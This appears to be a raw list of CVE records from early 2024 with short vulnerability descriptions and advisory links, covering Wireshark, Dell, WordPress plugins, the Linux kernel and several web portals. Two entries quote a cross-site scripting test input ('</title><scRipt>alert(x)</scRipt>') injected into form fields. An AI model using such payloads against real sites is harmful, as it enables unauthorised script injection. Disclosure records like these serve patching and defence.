CVE    2024    217    Candidate    A use-after-free flaw was found in PackageKitd. In some conditions, the order of cleanup mechanics for a transaction could be impacted. As a result, some memory access could occur on memory regions that were previously freed. Once freed, a memory region can be reused for other allocations and any previously stored data in this memory region is considered lost.    MISC:RHBZ#2256624   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256624   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0217   |   URL:https://access.redhat.com/security/cve/CVE-2024-0217   |   MISC:https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79   |   URL:https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79    Assigned (20240103)
CVE    2024    213    Candidate    A buffer overflow vulnerability in TA for Linux and TA for MacOS prior to 5.8.1 allows a local user to gain elevated permissions, or cause a Denial of Service (DoS), through exploiting a memory corruption issue in the TA service, which runs as root. This may also result in the disabling of event reporting to ePO, caused by failure to validate input from the file correctly.    MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10416   |   URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10416    Assigned (20240103)
CVE    2024    212    Candidate    The Cloudflare WordPress plugin was found to be vulnerable to improper authentication. The vulnerability enables attackers with a lower privileged account to access data from the Cloudflare API.    MISC:https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3   |   URL:https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3   |   MISC:https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2   |   URL:https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2    Assigned (20240103)
CVE    2024    211    Candidate    DOCSIS dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file    MISC:GitLab Issue #19557   |   URL:https://gitlab.com/wireshark/wireshark/-/issues/19557   |   MISC:https://www.wireshark.org/security/wnpa-sec-2024-05.html   |   URL:https://www.wireshark.org/security/wnpa-sec-2024-05.html    Assigned (20240103)
CVE    2024    210    Candidate    Zigbee TLV dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file    MISC:GitLab Issue #19504   |   URL:https://gitlab.com/wireshark/wireshark/-/issues/19504   |   MISC:https://www.wireshark.org/security/wnpa-sec-2024-04.html   |   URL:https://www.wireshark.org/security/wnpa-sec-2024-04.html    Assigned (20240103)
CVE    2024    209    Candidate    IEEE 1609.2 dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file    MISC:GitLab Issue #19501   |   URL:https://gitlab.com/wireshark/wireshark/-/issues/19501   |   MISC:https://www.wireshark.org/security/wnpa-sec-2024-02.html   |   URL:https://www.wireshark.org/security/wnpa-sec-2024-02.html    Assigned (20240103)
CVE    2024    208    Candidate    GVCP dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file    FEDORA:FEDORA-2024-b72131479b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34DBP5P2RHQ7XUABPANYYMOGV5KS6VEP/   |   FEDORA:FEDORA-2024-fdc7dfb959   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MADSCHKZSCKQ5NLIX3UMOIJD2JZ65L4V/   |   MISC:GitLab Issue #19496   |   URL:https://gitlab.com/wireshark/wireshark/-/issues/19496   |   MISC:https://www.wireshark.org/security/wnpa-sec-2024-01.html   |   URL:https://www.wireshark.org/security/wnpa-sec-2024-01.html   |   MLIST:[debian-lts-announce] 20240229 [SECURITY] [DLA 3746-1] wireshark security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00016.html    Assigned (20240103)
CVE    2024    207    Candidate    HTTP3 dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file    MISC:GitLab Issue #19502   |   URL:https://gitlab.com/wireshark/wireshark/-/issues/19502   |   MISC:https://www.wireshark.org/security/wnpa-sec-2024-03.html   |   URL:https://www.wireshark.org/security/wnpa-sec-2024-03.html    Assigned (20240103)
CVE    2024    206    Candidate    A symbolic link manipulation vulnerability in Trellix Anti-Malware Engine prior to the January 2024 release allows an authenticated local user to potentially gain an escalation of privileges. This was achieved by adding an entry to the registry under the Trellix ENS registry folder with a symbolic link to files that the user wouldn't normally have permission to. After a scan, the Engine would follow the links and remove the files    MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10415   |   URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10415    Assigned (20240103)
CVE    2024    204    Candidate    Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.    MISC:http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html   |   MISC:http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html   |   MISC:https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml   |   URL:https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml   |   MISC:https://www.fortra.com/security/advisory/fi-2024-001   |   URL:https://www.fortra.com/security/advisory/fi-2024-001    Assigned (20240103)
CVE    2024    203    Candidate    The Digits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.1. This is due to missing nonce validation in the 'digits_save_settings' function. This makes it possible for unauthenticated attackers to modify the default role of registered users to elevate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://digits.unitedover.com/changelog/   |   URL:https://digits.unitedover.com/changelog/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve    Assigned (20240102)
CVE    2024    202    Candidate    A security vulnerability has been identified in the cryptlib cryptographic library when cryptlib is compiled with the support for RSA key exchange ciphersuites in TLS (by setting the USE_RSA_SUITES define), it will be vulnerable to the timing variant of the Bleichenbacher attack. An attacker that is able to perform a large number of connections to the server will be able to decrypt RSA ciphertexts or forge signatures using server's certificate.    MISC:RHBZ#2256518   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256518    Assigned (20240102)
CVE    2024    201    Candidate    The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_settings' function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings.    MISC:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263   |   URL:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263   |   MISC:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263   |   URL:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve    Assigned (20240102)
CVE    2024    200    Candidate    An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8    Assigned (20240102)
CVE    2024    199    Candidate    An authorization bypass vulnerability was discovered in GitLab affecting versions 11.3 prior to 16.7.7, 16.7.6 prior to 16.8.4, and 16.8.3 prior to 16.9.2. An attacker could bypass CODEOWNERS by utilizing a crafted payload in an old feature branch to perform malicious actions.    MISC:GitLab Issue #436977   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/436977   |   MISC:HackerOne Bug Bounty Report #2295423   |   URL:https://hackerone.com/reports/2295423   |   MISC:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/   |   URL:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/    Assigned (20240102)
CVE    2024    197    Candidate    A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.    MISC:https://supportportal.thalesgroup.com   |   URL:https://supportportal.thalesgroup.com    Assigned (20240102)
CVE    2024    196    Candidate    A vulnerability has been found in Magic-Api up to 2.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resource/file/api/save?auto=1. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249511.    MISC:https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md   |   URL:https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md   |   MISC:https://vuldb.com/?ctiid.249511   |   URL:https://vuldb.com/?ctiid.249511   |   MISC:https://vuldb.com/?id.249511   |   URL:https://vuldb.com/?id.249511    Assigned (20240102)
CVE    2024    195    Candidate    A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.    MISC:https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md   |   URL:https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md   |   MISC:https://vuldb.com/?ctiid.249510   |   URL:https://vuldb.com/?ctiid.249510   |   MISC:https://vuldb.com/?id.249510   |   URL:https://vuldb.com/?id.249510    Assigned (20240102)
CVE    2024    194    Candidate    A vulnerability, which was classified as critical, has been found in CodeAstro Internet Banking System up to 1.0. This issue affects some unknown processing of the file pages_account.php of the component Profile Picture Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249509 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing   |   URL:https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.249509   |   URL:https://vuldb.com/?ctiid.249509   |   MISC:https://vuldb.com/?id.249509   |   URL:https://vuldb.com/?id.249509    Assigned (20240102)
CVE    2024    193    Candidate    A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system.    MISC:RHBZ#2255653   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2255653   |   MISC:RHSA-2024:1018   |   URL:https://access.redhat.com/errata/RHSA-2024:1018   |   MISC:RHSA-2024:1019   |   URL:https://access.redhat.com/errata/RHSA-2024:1019   |   MISC:RHSA-2024:1248   |   URL:https://access.redhat.com/errata/RHSA-2024:1248   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0193   |   URL:https://access.redhat.com/security/cve/CVE-2024-0193    Assigned (20240102)
CVE    2024    192    Candidate    A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file downloadable.php of the component Add Downloadable. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249505 was assigned to this vulnerability.    MISC:https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM   |   URL:https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM   |   MISC:https://vuldb.com/?ctiid.249505   |   URL:https://vuldb.com/?ctiid.249505   |   MISC:https://vuldb.com/?id.249505   |   URL:https://vuldb.com/?id.249505    Assigned (20240102)
CVE    2024    191    Candidate    A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/uploads/. The manipulation leads to file and directory information exposure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249504.    MISC:https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY   |   URL:https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY   |   MISC:https://vuldb.com/?ctiid.249504   |   URL:https://vuldb.com/?ctiid.249504   |   MISC:https://vuldb.com/?id.249504   |   URL:https://vuldb.com/?id.249504    Assigned (20240102)
CVE    2024    190    Candidate    A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file add_quiz.php of the component Quiz Handler. The manipulation of the argument Quiz Title/Quiz Description with the input </title><scRipt>alert(x)</scRipt> leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249503.    MISC:https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw   |   URL:https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw   |   MISC:https://vuldb.com/?ctiid.249503   |   URL:https://vuldb.com/?ctiid.249503   |   MISC:https://vuldb.com/?id.249503   |   URL:https://vuldb.com/?id.249503    Assigned (20240102)
CVE    2024    189    Candidate    A vulnerability has been found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file teacher_message.php of the component Create Message Handler. The manipulation of the argument Content with the input </title><scRipt>alert(x)</scRipt> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249502 is the identifier assigned to this vulnerability.    MISC:https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q   |   URL:https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q   |   MISC:https://vuldb.com/?ctiid.249502   |   URL:https://vuldb.com/?ctiid.249502   |   MISC:https://vuldb.com/?id.249502   |   URL:https://vuldb.com/?id.249502    Assigned (20240102)
CVE    2024    188    Candidate    A vulnerability, which was classified as problematic, was found in RRJ Nueva Ecija Engineer Online Portal 1.0. This affects an unknown part of the file change_password_teacher.php. The manipulation leads to weak password requirements. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-249501 was assigned to this vulnerability.    MISC:https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk   |   URL:https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk   |   MISC:https://vuldb.com/?ctiid.249501   |   URL:https://vuldb.com/?ctiid.249501   |   MISC:https://vuldb.com/?id.249501   |   URL:https://vuldb.com/?id.249501    Assigned (20240102)
CVE    2024    187    Candidate    The Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin    MISC:https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/   |   URL:https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/    Assigned (20240101)
CVE    2024    186    Candidate    A vulnerability classified as problematic has been found in HuiRan Host Reseller System up to 2.0.0. Affected is an unknown function of the file /user/index/findpass?do=4 of the component HTTP POST Request Handler. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249444.    MISC:https://note.zhaoj.in/share/WwPWWizD2Spk   |   URL:https://note.zhaoj.in/share/WwPWWizD2Spk   |   MISC:https://vuldb.com/?ctiid.249444   |   URL:https://vuldb.com/?ctiid.249444   |   MISC:https://vuldb.com/?id.249444   |   URL:https://vuldb.com/?id.249444    Assigned (20240101)
CVE    2024    185    Candidate    A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file dasboard_teacher.php of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249443.    MISC:https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE   |   URL:https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE   |   MISC:https://vuldb.com/?ctiid.249443   |   URL:https://vuldb.com/?ctiid.249443   |   MISC:https://vuldb.com/?id.249443   |   URL:https://vuldb.com/?id.249443    Assigned (20240101)
CVE    2024    184    Candidate    A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/edit_teacher.php of the component Add Enginer. The manipulation of the argument Firstname/Lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249442 is the identifier assigned to this vulnerability.    MISC:https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k   |   URL:https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k   |   MISC:https://vuldb.com/?ctiid.249442   |   URL:https://vuldb.com/?ctiid.249442   |   MISC:https://vuldb.com/?id.249442   |   URL:https://vuldb.com/?id.249442    Assigned (20240101)
CVE    2024    183    Candidate    A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/students.php of the component NIA Office. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249441 was assigned to this vulnerability.    MISC:https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E   |   URL:https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E   |   MISC:https://vuldb.com/?ctiid.249441   |   URL:https://vuldb.com/?ctiid.249441   |   MISC:https://vuldb.com/?id.249441   |   URL:https://vuldb.com/?id.249441    Assigned (20240101)
CVE    2024    182    Candidate    A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-249440.    MISC:VDB-249440 | CTI Indicators   |   URL:https://vuldb.com/?ctiid.249440   |   MISC:VDB-249440 | SourceCodester Engineers Online Portal Admin Login sql injection   |   URL:https://vuldb.com/?id.249440    Assigned (20240101)
CVE    2024    181    Candidate    A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin_user.php of the component Admin Panel. The manipulation of the argument Firstname/Lastname/Username leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249433 was assigned to this vulnerability.    MISC:https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA   |   URL:https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA   |   MISC:https://vuldb.com/?ctiid.249433   |   URL:https://vuldb.com/?ctiid.249433   |   MISC:https://vuldb.com/?id.249433   |   URL:https://vuldb.com/?id.249433    Assigned (20240101)
CVE    2024    173    Candidate    Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability. A local low privileged attacker could potentially exploit this vulnerability to read the contents of non-SMM stack memory.    MISC:https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability    Assigned (20231214)
CVE    2024    170    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_cava utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and executing arbitrary operating system commands with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20231214)
CVE    2024    169    Candidate    Dell Unity, versions prior to 5.4, contains a cross-site scripting (XSS) vulnerability. An authenticated attacker could potentially exploit this vulnerability, leading users to download and execute malicious software crafted by this product's feature to compromise their systems.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20231214)
CVE    2024    168    Candidate    Dell Unity, versions prior to 5.4, contains a Command Injection Vulnerability in svc_oscheck utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to inject arbitrary operating system commands. This vulnerability allows an authenticated attacker to execute commands with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20231214)
CVE    2024    167    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in the svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to overwrite arbitrary files on the file system with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20231214)
CVE    2024    166    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_tcpdump utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands with elevated privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20231214)
CVE    2024    165    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_acldb_dump utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20231214)
CVE    2024    164    Candidate    Dell Unity, versions prior to 5.4, contain an OS Command Injection Vulnerability in its svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary commands with elevated privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20231214)
CVE    2024    163    Candidate    Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain a TOCTOU race condition vulnerability. A local low privileged attacker could potentially exploit this vulnerability to gain access to otherwise unauthorized resources.    MISC:https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability    Assigned (20231214)
CVE    2024    162    Candidate    Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability. A local low privileged attacker could potentially exploit this vulnerability leading to out-of-bound read/writes to SMRAM.    MISC:https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability    Assigned (20231214)
CVE    2024    161    Candidate    Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability. A local low privileged attacker could potentially exploit this vulnerability leading to arbitrary writes to SMRAM.    MISC:https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability    Assigned (20231214)
CVE    2024    156    Candidate    Dell Digital Delivery, versions prior to 5.0.86.0, contain a Buffer Overflow vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to arbitrary code execution and/or privilege escalation.    MISC:https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability    Assigned (20231214)
CVE    2024    155    Candidate    Dell Digital Delivery, versions prior to 5.0.86.0, contain a Use After Free Vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to an application crash or execution of arbitrary code.    MISC:https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033   |   URL:https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033    Assigned (20231214)
CVE    2024    68    Candidate    Improper Link Resolution Before File Access ('Link Following') vulnerability in HYPR Workforce Access on MacOS allows File Manipulation. This issue affects Workforce Access: before 8.7.1.    MISC:https://www.hypr.com/trust-center/security-advisories   |   URL:https://www.hypr.com/trust-center/security-advisories    Assigned (20231127)
CVE    2024    57    Candidate    .NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability    MISC:.NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0057   |   MISC:https://security.netapp.com/advisory/ntap-20240208-0007/   |   URL:https://security.netapp.com/advisory/ntap-20240208-0007/    Assigned (20231122)
CVE    2024    56    Candidate    Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability    MISC:Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0056    Assigned (20231122)
CVE    2024    55    Candidate    Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX APIs mediaclip.cgi and playclip.cgi were vulnerable to file globbing which could lead to a resource exhaustion attack. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.    MISC:https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf   |   URL:https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf    Assigned (20231121)
